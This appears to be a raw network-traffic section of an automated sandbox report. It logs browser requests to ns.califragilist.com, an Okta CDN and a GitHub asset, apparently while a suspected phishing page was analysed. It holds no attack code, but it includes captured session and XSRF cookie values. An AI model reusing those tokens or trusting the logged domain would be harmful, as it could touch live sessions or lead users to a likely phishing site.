https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241106%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241106T155559Z&X-Amz-Expires=300&X-Amz-Signature=c35f79085d4530d97feeeba7c17e7b0be2f621881773f7b10a56f304666d5b45&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ns.califragilist.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ns.califragilist.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /34ZDG48CiIUIKX2LghMRxuoYEP67110 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /34ZDG48CiIUIKX2LghMRxuoYEP67110 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 